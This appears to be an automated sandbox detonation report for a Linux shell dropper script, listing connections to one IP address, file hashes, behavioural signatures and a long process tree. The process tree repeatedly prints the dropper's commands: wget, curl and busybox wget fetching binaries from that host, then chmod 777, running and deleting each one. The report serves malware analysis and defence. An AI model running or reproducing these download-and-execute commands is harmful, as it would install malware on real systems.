DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/798-1-0xb6758000-0xb6769044-memory.dmp

memory/822-2-0xb6778000-0xb6789044-memory.dmp

memory/848-3-0xb6705000-0xb6716044-memory.dmp

memory/849-4-0xb672d000-0xb673e044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

debian9-mipsbe-20240611-en

Max time kernel

63s

Max time network

64s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

